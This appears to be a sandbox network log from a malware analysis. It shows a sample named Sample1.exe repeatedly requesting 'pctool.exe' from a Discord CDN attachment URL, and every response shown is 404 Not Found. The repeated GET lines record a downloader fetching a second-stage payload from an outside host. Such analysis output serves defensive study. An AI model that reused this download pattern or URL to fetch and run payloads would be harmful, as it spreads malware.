2025-01-15 14:12:22 UTC	36	IN	Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e Data Ascii: This content is no longer available.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.25	49738	162.159.130.233	443	7448	C:\Users\user\Desktop\Sample1.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:12:28 UTC	128	OUT	GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive
2025-01-15 14:12:28 UTC	1041	IN	HTTP/1.1 404 Not Found Date: Wed, 15 Jan 2025 14:12:28 GMT Content-Type: text/plain;charset=UTF-8 Content-Length: 36 Connection: close Set-Cookie: __cf_bm=LJSMEuIoxRaF3OIOkCd4VGz2Jw_JUh.Mv1ckWQOFTwM-1736950348-1.0.1.1-DviW1GMP_updWEer8hLtsQya_mKy_ZPYaw1BvQapHDlPH6ox3xLZbPU0V4TAR.q4zvI81NBMM_rYllz1jxOxfQ; path=/; expires=Wed, 15-Jan-25 14:42:28 GMT; domain=.discordapp.com; HttpOnly; Secure Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6mLMk5fLSUGQGvHqmk46GLrEC1Zd6foOwe9l8ZK1DF3aZtbtv7do2NbUjJa3ZrFkFA1yXLVQmxW3xyVT4UkWvTE8w0B8l4Ft1HMaPDxVNH1d35CNmryB7wjizlPxbXF6gQf5pw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Set-Cookie: _cfuvid=ZQdE8GnER6CrlF4v6ot6rg6zCv9YS3LhAqjGsqakHfo-1736950348453-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None Server: cloudflare CF-RAY: 902675fd8d884384-EWR alt-svc: h3=":443"; ma=86400
2025-01-15 14:12:28 UTC	36	IN	Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e Data Ascii: This content is no longer available.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.25	49739	162.159.130.233	443	7448	C:\Users\user\Desktop\Sample1.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:12:33 UTC	128	OUT	GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive
2025-01-15 14:12:34 UTC	1051	IN	HTTP/1.1 404 Not Found Date: Wed, 15 Jan 2025 14:12:34 GMT Content-Type: text/plain;charset=UTF-8 Content-Length: 36 Connection: close Set-Cookie: __cf_bm=hhngZ2qBPYSB8BkPyLZ2MnjJW2Du.BJqiosZ03AjJdM-1736950354-1.0.1.1-..HOBGZj9UjRUrJc.34SVt21mq5sd86so_fmSAVJdJsWWnCHK1_gy_X50HlnBTd.EVYKPcLKBcQwes6Qd9fOxg; path=/; expires=Wed, 15-Jan-25 14:42:34 GMT; domain=.discordapp.com; HttpOnly; Secure Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NLXHpkaKC%2FIP17HdD3me65HDfbW7dzjTQHrtGKrbx9NeOObsOmH6%2FU2J2E8JFBteXZPEf3Iidz1gD4nrio7XOXSRUvq01oQRpmlA%2FwzvDW1JA4Xzgi9hn6IYJEeYAE%2Bt1Q7i%2Bg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Set-Cookie: _cfuvid=pMjwYqk14OS7MRjaO8YhStMSETgNAIgT.4XixjzvjuU-1736950354079-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None Server: cloudflare CF-RAY: 90267620e9f97c99-EWR alt-svc: h3=":443"; ma=86400
2025-01-15 14:12:34 UTC	36	IN	Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e Data Ascii: This content is no longer available.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.25	49740	162.159.130.233	443	7448	C:\Users\user\Desktop\Sample1.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:12:39 UTC	128	OUT	GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive
2025-01-15 14:12:39 UTC	1051	IN	HTTP/1.1 404 Not Found Date: Wed, 15 Jan 2025 14:12:39 GMT Content-Type: text/plain;charset=UTF-8 Content-Length: 36 Connection: close Set-Cookie: __cf_bm=b1uK__Ku6uGK53epW5kop.IUCAGbK21PasdF6Vgite0-1736950359-1.0.1.1-QL0plcT1gpV9ehB.txNli4M8QhUSqn5pwPhFexmVPb1rfLXOEvsuK4EJkqFhPKXBBK1xehiH16S1v3PfhNH77g; path=/; expires=Wed, 15-Jan-25 14:42:39 GMT; domain=.discordapp.com; HttpOnly; Secure Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xWIwUQyBBvDjw7lNeo42N0X9WatLx6kLumb2bQC2w9EG1%2Blc%2BzoLw%2BhxBWfZsBOloRHYcjfsIovNZut9jeLli%2Bil3tBXUW8auFbaoYdTRpG4T0G6ioElUDd%2Fjt1mOz9CYHMZXg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Set-Cookie: _cfuvid=2yFIDIcyIeWCxEETYTR6PKvMMo1eW8O56i0WC5bOG_w-1736950359721-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None Server: cloudflare CF-RAY: 9026764429084374-EWR alt-svc: h3=":443"; ma=86400
2025-01-15 14:12:39 UTC	36	IN	Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e Data Ascii: This content is no longer available.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.25	49741	162.159.130.233	443	7448	C:\Users\user\Desktop\Sample1.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:12:45 UTC	128	OUT	GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive
2025-01-15 14:12:45 UTC	1047	IN	HTTP/1.1 404 Not Found Date: Wed, 15 Jan 2025 14:12:45 GMT Content-Type: text/plain;charset=UTF-8 Content-Length: 36 Connection: close Set-Cookie: __cf_bm=B48AXGaw7zMB81.MOaqTC2iil_qKMSFhNN4DoilpPbk-1736950365-1.0.1.1-JiGHSoXnItnIWMjr_ErbeVj_AaYAxJScHU6HzRnMZNJ.wIdljIzoLSlTN0wW.gaj1o0qLJTrvkYKModmxBfFnw; path=/; expires=Wed, 15-Jan-25 14:42:45 GMT; domain=.discordapp.com; HttpOnly; Secure Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YhOrOGVpy4qfCSF%2FRrbZzDiKfEYKsw8rmtTfI%2FDN4aGBvhTebZZSWMpgOIbJr3qeFs0FbbUTO6uwEpAA0214KUobn8tpn2fV9EnJM3DDNoc8Esymn9RwPXbm%2FlfcDarjVwXWKA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Set-Cookie: _cfuvid=onGQX0ZL4ZVyUFq2UCDOuXH1KukGw5CdyvYobdptsv0-1736950365389-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None Server: cloudflare CF-RAY: 902676676b897cf6-EWR alt-svc: h3=":443"; ma=86400
2025-01-15 14:12:45 UTC	36	IN	Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e Data Ascii: This content is no longer available.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.25	49742	162.159.130.233	443	7448	C:\Users\user\Desktop\Sample1.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:12:50 UTC	128	OUT	GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive
2025-01-15 14:12:51 UTC	1047	IN	HTTP/1.1 404 Not Found Date: Wed, 15 Jan 2025 14:12:51 GMT Content-Type: text/plain;charset=UTF-8 Content-Length: 36 Connection: close Set-Cookie: __cf_bm=eJ3wQK0zh7V8zQ4aBGDBiQ93H_yutNTcqXblB.9yc78-1736950371-1.0.1.1-1l1F1IPs_8HfCKIdPnNbisabiF1031VMf9Ok9pmFRKZ4.58Sn.AcsWxohKWHUzwVafGm1Htl8t.nvs9doQUaHg; path=/; expires=Wed, 15-Jan-25 14:42:51 GMT; domain=.discordapp.com; HttpOnly; Secure Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8EfFxGKm82iYElgpZJuOll8INloKc72zUOI%2FsgqM%2B35dWfMRqqtolW%2BBR6FUTnzT4CW0DhpjROaFu9hccIKn6OCtaxmWNgM80dCLpVdIOB6IOxx76SyzsEjXG6bchMwOPY5ccg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Set-Cookie: _cfuvid=xE4eOMIdalW5deOT.J6w6Ier.jGALHVBntw_vF94e1c-1736950371028-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None Server: cloudflare CF-RAY: 9026768adf9e4373-EWR alt-svc: h3=":443"; ma=86400
2025-01-15 14:12:51 UTC	36	IN	Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e Data Ascii: This content is no longer available.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.25	49743	162.159.130.233	443	7448	C:\Users\user\Desktop\Sample1.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:12:56 UTC	128	OUT	GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive
2025-01-15 14:12:56 UTC	1047	IN	HTTP/1.1 404 Not Found Date: Wed, 15 Jan 2025 14:12:56 GMT Content-Type: text/plain;charset=UTF-8 Content-Length: 36 Connection: close Set-Cookie: __cf_bm=yf0aBe99JX2GJq0cIRjxwVIMTqMyRnRZ9W4zAOmE_AY-1736950376-1.0.1.1-W1Zp78f9PCHusRItm8Mvjhayuhtr7uTd4KrTicgt1biXfHLk3fzypbgbtZtLpOlGy3OeA.VCt_s1mqGB.eyBMw; path=/; expires=Wed, 15-Jan-25 14:42:56 GMT; domain=.discordapp.com; HttpOnly; Secure Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9HCFIZiUAAaSgDcrUcsGGKnSFhhFWAxsGUqYpk0YetdxBDlVfJt8ZsD1Qz3TJb1l%2BH%2FWZnhdziUWqKyVIpr5LWlu%2BxwtZoDlolEPukbxGYRdpiggov7YJZtitLGxppvpEsVl7Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Set-Cookie: _cfuvid=_uQ9HKJpeGHm.bAJrLC3U4yd4ElbmEp1W0uYLu5lPEw-1736950376658-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None Server: cloudflare CF-RAY: 902676ae0c2a4241-EWR alt-svc: h3=":443"; ma=86400
2025-01-15 14:12:56 UTC	36	IN	Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e Data Ascii: This content is no longer available.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.25	49744	162.159.130.233	443	7448	C:\Users\user\Desktop\Sample1.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:13:02 UTC	128	OUT	GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive
2025-01-15 14:13:02 UTC	1051	IN	HTTP/1.1 404 Not Found Date: Wed, 15 Jan 2025 14:13:02 GMT Content-Type: text/plain;charset=UTF-8 Content-Length: 36 Connection: close Set-Cookie: __cf_bm=f5v4AEhbwUSspuXsbxxlEaCOlN0m8egcb9KjnEghqr4-1736950382-1.0.1.1-CuxCv6ToqTQqZGzpOXYxD0jWIF0OXpVgb5.BCjels4Tus.BAcOvfrJVpwdSzaHQBFnK19qLYNpislIKmrpofpw; path=/; expires=Wed, 15-Jan-25 14:43:02 GMT; domain=.discordapp.com; HttpOnly; Secure Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PjiMDn4PWP6Eco0SC0S3WS%2BGcGIRiKdiDLjd%2BfmzW2OzHJB5Jxet10Ac1jcTdqXBhg4QokM%2FGKiWf1Z9R0xsUJMAI%2FLYIBlUORqSpGJg3CXX4Qi4lU%2BbrqUGG4WMu0QSTAAVCQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Set-Cookie: _cfuvid=tj0icPvD0PI8aV0.ItDhR746.CPDRVOSMA9uc4AJGyQ-1736950382329-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None Server: cloudflare CF-RAY: 902676d17a8eefa5-EWR alt-svc: h3=":443"; ma=86400
2025-01-15 14:13:02 UTC	36	IN	Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e Data Ascii: This content is no longer available.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.25	49745	162.159.130.233	443	7448	C:\Users\user\Desktop\Sample1.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:13:07 UTC	128	OUT	GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive
2025-01-15 14:13:08 UTC	1051	IN	HTTP/1.1 404 Not Found Date: Wed, 15 Jan 2025 14:13:07 GMT Content-Type: text/plain;charset=UTF-8 Content-Length: 36 Connection: close Set-Cookie: __cf_bm=OrJNZCbWSMb9SB0qQPwOs2FXswPlBJCeDWojah4_R4c-1736950387-1.0.1.1-MmAClhyuIS_cGktaxPVRYcsbfnU3UtU769pg0ViLzZd3gP7PbXkDG5lBU2dE1VPqdSaZB7HTqTFTj5SaSv5Qlw; path=/; expires=Wed, 15-Jan-25 14:43:07 GMT; domain=.discordapp.com; HttpOnly; Secure Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MiPYZhxtxH7ubmD%2BlFyPDyAd7IQKW7T61INysBX7cMtoI1vVPZL%2BzYO8rxHNUap2kXAkWd%2BdFK0itjvdfsWNvFQ7MPlXV%2FSSSnV%2BUKOismdH5nDrCefnMtr2Q3VRfR5ObZtCvA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Set-Cookie: _cfuvid=zcKz.xAga93BfQpMGCM5upmtLM8Ct.zi7AWfPaBza0I-1736950387982-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None Server: cloudflare CF-RAY: 902676f4b84842d5-EWR alt-svc: h3=":443"; ma=86400
2025-01-15 14:13:08 UTC	36	IN	Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e Data Ascii: This content is no longer available.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.25	49746	162.159.130.233	443	7448	C:\Users\user\Desktop\Sample1.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:13:13 UTC	128	OUT	GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive
2025-01-15 14:13:13 UTC	1051	IN	HTTP/1.1 404 Not Found Date: Wed, 15 Jan 2025 14:13:13 GMT Content-Type: text/plain;charset=UTF-8 Content-Length: 36 Connection: close Set-Cookie: __cf_bm=MWg3LFq0v2YugdjbO5hpNb5vgoPPbJmrg4EtMPa47tM-1736950393-1.0.1.1-k5jGjwBZK2ziXwwurJMh6.3Tb5uMLbdOwDDHIk80hK3udzTTZwn5sUWY2B5lAtBNyvGgyOfSSjnQhT.TZiscdQ; path=/; expires=Wed, 15-Jan-25 14:43:13 GMT; domain=.discordapp.com; HttpOnly; Secure Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8e4LeCSs4wu%2FWW7stEl%2FfM%2BFFM%2FkJE1fTeznJxiLDu4FodPj8HySRj4G13jY3IxOhtNQz4FlFX7%2BMSvPuAd6rsNskPgB7hrtmU4FiXgrGiY3tHJ1qnSLQbDHensVPfh3cF1M6g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Set-Cookie: _cfuvid=CLqVvJ22dgCz1ImQdmtmtueZ77th_Jtazjc.mn0pixk-1736950393637-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None Server: cloudflare CF-RAY: 902677182abdde93-EWR alt-svc: h3=":443"; ma=86400
2025-01-15 14:13:13 UTC	36	IN	Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e Data Ascii: This content is no longer available.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.25	49747	162.159.130.233	443	7448	C:\Users\user\Desktop\Sample1.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:13:19 UTC	104	OUT	GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1 Host: cdn.discordapp.com
2025-01-15 14:13:19 UTC	1051	IN	HTTP/1.1 404 Not Found Date: Wed, 15 Jan 2025 14:13:19 GMT Content-Type: text/plain;charset=UTF-8 Content-Length: 36 Connection: close Set-Cookie: __cf_bm=cTSBNnlR6rG3uuE4tgTVEZIXqnNxFfm2ztZ9puyUZUA-1736950399-1.0.1.1-fQevXWuXsIXpBB_CLRE3yurKIbHNrFPpiBZScAySb4S4vVFQqb40GKgA3Eg3mEPaldsmt.6kryJ5hWGCb2beBw; path=/; expires=Wed, 15-Jan-25 14:43:19 GMT; domain=.discordapp.com; HttpOnly; Secure Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hoE6baOahH6uFVVrzP1efB%2BtNP33dNhVC17s%2FL3IFWgeeLUSAu8nTmeHVtLXklUd%2FJFP1e9dN0CFEXtbDEg6fJLrUOR9mgjD%2BNboazweb5aiWIYV6ItHh7B0t8u%2BWPCDSIy74g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Set-Cookie: _cfuvid=7IKtskEPAmWvLVIbiwf6w81ap2eNJvml54cVLl3ip90-1736950399298-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None Server: cloudflare CF-RAY: 9026773b6f1143fa-EWR alt-svc: h3=":443"; ma=86400
2025-01-15 14:13:19 UTC	36	IN	Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e Data Ascii: This content is no longer available.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.25	49748	162.159.130.233	443	7448	C:\Users\user\Desktop\Sample1.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:13:24 UTC	128	OUT	GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive
2025-01-15 14:13:24 UTC	1053	IN	HTTP/1.1 404 Not Found Date: Wed, 15 Jan 2025 14:13:24 GMT Content-Type: text/plain;charset=UTF-8 Content-Length: 36 Connection: close Set-Cookie: __cf_bm=ifxyyuCz9bdaEeLU9RIcp6_1ntObO2jx9whozIkyhrQ-1736950404-1.0.1.1-5Stp4Wg.SlgumtsOcxxpAiASs0n8U5Bfj_zz1mV0Aa3tMVTcjVlfZB2vPR7dDZVgrmuIOcb6jLffwxDM38hjjw; path=/; expires=Wed, 15-Jan-25 14:43:24 GMT; domain=.discordapp.com; HttpOnly; Secure Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UCCGnr8E66ZORaqmQ1SIAIBSkoHETKiMrf1tFX%2Bhqsyv%2FDsry%2BSEkDUbOzdZ5HeEr7cw%2BrIfYiw8irsWwug6FUHvGyUyomY1sm8afmu%2BlNbx806L14sb%2Bjoe7yVehVrCCw2tHA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Set-Cookie: _cfuvid=fD3yGNn_4mMvQMN8dEPq_.v2jZNI_OtFPq.HOZbU8Qw-1736950404927-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None Server: cloudflare CF-RAY: 9026775ea981440b-EWR alt-svc: h3=":443"; ma=86400
2025-01-15 14:13:24 UTC	36	IN	Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e Data Ascii: This content is no longer available.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.25	49749	162.159.134.233	443	7448	C:\Users\user\Desktop\Sample1.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:13:30 UTC	128	OUT	GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive
2025-01-15 14:13:30 UTC	1055	IN	HTTP/1.1 404 Not Found Date: Wed, 15 Jan 2025 14:13:30 GMT Content-Type: text/plain;charset=UTF-8 Content-Length: 36 Connection: close Set-Cookie: __cf_bm=gfFHpnvt.99RJzODScbH3OrSMxkE1DjlUgCaO1R1ffE-1736950410-1.0.1.1-CarQw.YE7c_lJs6v1S7Qf.IQC4Vo8X9u45fdqBMxXrPvw_oHLnawFltXckEOwiZtq39b8TT2lkGWdiIZTkSDAA; path=/; expires=Wed, 15-Jan-25 14:43:30 GMT; domain=.discordapp.com; HttpOnly; Secure Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K9R8Kf%2FAFxrSBCFOPYVR3l5hBNOCn9ltbRzmH%2BoG%2FfjTh%2FwRfR%2F3%2FC%2BOCy0YOcI0ZVRLOKgmMICbVaiYqocchgGZq8lBVzOaJ5XjiMVYsL5cDlQCptm2CoNOl1xTPh3l2GdURA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Set-Cookie: _cfuvid=IcBIhoyTGo2krQj3D77B3M8_mcR5cv2DvIZGaKoLodc-1736950410549-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None Server: cloudflare CF-RAY: 90267781dc840c9e-EWR alt-svc: h3=":443"; ma=86400
2025-01-15 14:13:30 UTC	36	IN	Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e Data Ascii: This content is no longer available.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.25	49752	162.159.134.233	443	7448	C:\Users\user\Desktop\Sample1.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:13:36 UTC	128	OUT	GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive
2025-01-15 14:13:36 UTC	1055	IN	HTTP/1.1 404 Not Found Date: Wed, 15 Jan 2025 14:13:36 GMT Content-Type: text/plain;charset=UTF-8 Content-Length: 36 Connection: close Set-Cookie: __cf_bm=rnFHOrbufp_lVdb.98Ps_aVEUqljGPjbnt5J8yJ9xaI-1736950416-1.0.1.1-XGi0683Jqf5LpbtTpILhJlG0NmcuEWIp4K4nrzuf44eOb_YJhsgm_ITPnT6Riu_AyC7lPwwQ35mKZm8mHZDJ8g; path=/; expires=Wed, 15-Jan-25 14:43:36 GMT; domain=.discordapp.com; HttpOnly; Secure Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9vlvOFSTIVQIhVowvJ5%2FDgkScWknXIg%2F%2Flx7VNqKjn5Ejn%2B3W5FwQZHhBSyEupXOTQkjykVJOJztpvnRvBN1ITHHt0DNB9%2F0K6PGrtql6uty9uEqUYC44ege0mM4U%2BhZr0mM%2FQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Set-Cookie: _cfuvid=pjOk8aZ1J.5m45iUaz43BxjWI8q7pHntGn3t5AfYQmY-1736950416193-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None Server: cloudflare CF-RAY: 902677a4fdf443d6-EWR alt-svc: h3=":443"; ma=86400
2025-01-15 14:13:36 UTC	36	IN	Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e Data Ascii: This content is no longer available.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.25	49755	162.159.134.233	443	7448	C:\Users\user\Desktop\Sample1.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:13:41 UTC	128	OUT	GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive
2025-01-15 14:13:41 UTC	1043	IN	HTTP/1.1 404 Not Found Date: Wed, 15 Jan 2025 14:13:41 GMT Content-Type: text/plain;charset=UTF-8 Content-Length: 36 Connection: close Set-Cookie: __cf_bm=qhotn6BXr.eM5o9SfOH7KAX6SeFwIksUae9OWbkv6bM-1736950421-1.0.1.1-EsUQPZSvCQJM3h3f54Jq7Q6g.FdM_VReFZKBlw8N17az59i_Oqfx7yyauw4agN1jjX0tEuwmWdT4qk2yW_4nyw; path=/; expires=Wed, 15-Jan-25 14:43:41 GMT; domain=.discordapp.com; HttpOnly; Secure Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Iu84wdMMdULe5y2Ret%2Fxir0j5VFJNaYEZYzKr76MQ1YhCOGd77jfQKrf9Dv9yZwPRZhARR1VJAuKK3wpjbcxAc5q6v5hsHTVnB1hKkHmjOWrRHf7BSGozTq2EoVfZuLdahdcXg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Set-Cookie: _cfuvid=hzreHT28j_QTBoXScGGrVuOcvxThrOO4QRjBzlLOqUQ-1736950421825-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None Server: cloudflare CF-RAY: 902677c85913f5fa-EWR alt-svc: h3=":443"; ma=86400
2025-01-15 14:13:41 UTC	36	IN	Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e Data Ascii: This content is no longer available.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.25	49756	162.159.134.233	443	7448	C:\Users\user\Desktop\Sample1.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:13:47 UTC	128	OUT	GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive
